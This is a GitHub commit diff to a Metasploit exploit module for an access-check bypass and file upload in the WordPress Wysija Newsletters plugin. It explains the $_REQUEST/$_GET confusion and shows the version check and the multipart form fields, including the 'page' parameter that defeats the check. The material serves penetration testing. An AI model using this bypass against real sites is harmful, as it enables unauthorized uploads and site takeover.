Skip to content

Commit a809c9e

Browse files
committed
Changed to vprint and added comment
1 parent c6e129c commit a809c9e

File tree

1 file changed

+4
-2
lines changed

1 file changed

+4
-2
lines changed

modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb

Lines changed: 4 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -27,7 +27,8 @@ def initialize(info = {})
2727
a POST variable overwrites a GET variable in the $_REQUEST array. The plugin
2828
uses $_REQUEST to check for access rights. By setting the POST parameter to
2929
something not beginning with 'wysija_', the check is bypassed. Wordpress uses
30-
the $_GET array to determine the page, so it is not affected by this.
30+
the $_GET array to determine the page, so it is not affected by this. The developers
31+
applied the fixes to all previous versions too.
3132
},
3233
'Author' =>
3334
[
@@ -85,7 +86,7 @@ def check
8586
# readme present, but no version number
8687
return Msf::Exploit::CheckCode::Detected if version.nil?
8788

88-
print_status("#{peer} - Found version #{version} of the plugin")
89+
vprint_status("#{peer} - Found version #{version} of the plugin")
8990

9091
if Gem::Version.new(version) < Gem::Version.new('2.6.8')
9192
return Msf::Exploit::CheckCode::Appears
@@ -107,6 +108,7 @@ def exploit
107108
data.add_part('on', nil, nil, 'form-data; name="overwriteexistingtheme"')
108109
data.add_part('themeupload', nil, nil, 'form-data; name="action"')
109110
data.add_part('Upload', nil, nil, 'form-data; name="submitter"')
111+
# this line bypasses the check implemented in version 2.6.7
110112
data.add_part(rand_text_alpha(10), nil, nil, 'form-data; name="page"')
111113
post_data = data.to_s
112114

0 commit comments

Comments
 (0)